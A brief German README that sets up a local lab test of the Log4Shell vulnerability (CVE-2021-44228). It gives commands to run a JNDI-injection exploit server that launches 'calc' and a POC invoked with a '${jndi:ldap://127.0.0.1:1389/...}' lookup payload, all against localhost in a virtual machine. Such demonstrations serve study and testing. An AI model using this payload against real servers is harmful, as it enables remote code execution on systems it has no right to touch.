
Log4Shell Ein Test für CVE-2021-44228
Testquellcode für LogShell(CVE-2021-44228).
Installieren Sie JDK8 (< 8u191) in einer virtuellen Maschine (Windows 10).
Kopieren Sie out\artifacts\POC_jar\POC.jar unter Windows.
Kopieren Sie JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar unter Windows, JNDI-Injection-Exploit herunterladen
Führen Sie java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A "127.0.0.1" aus
Führen Sie java -jar POC.jar ${jndi:ldap://127.0.0.1:1389/*****} aus
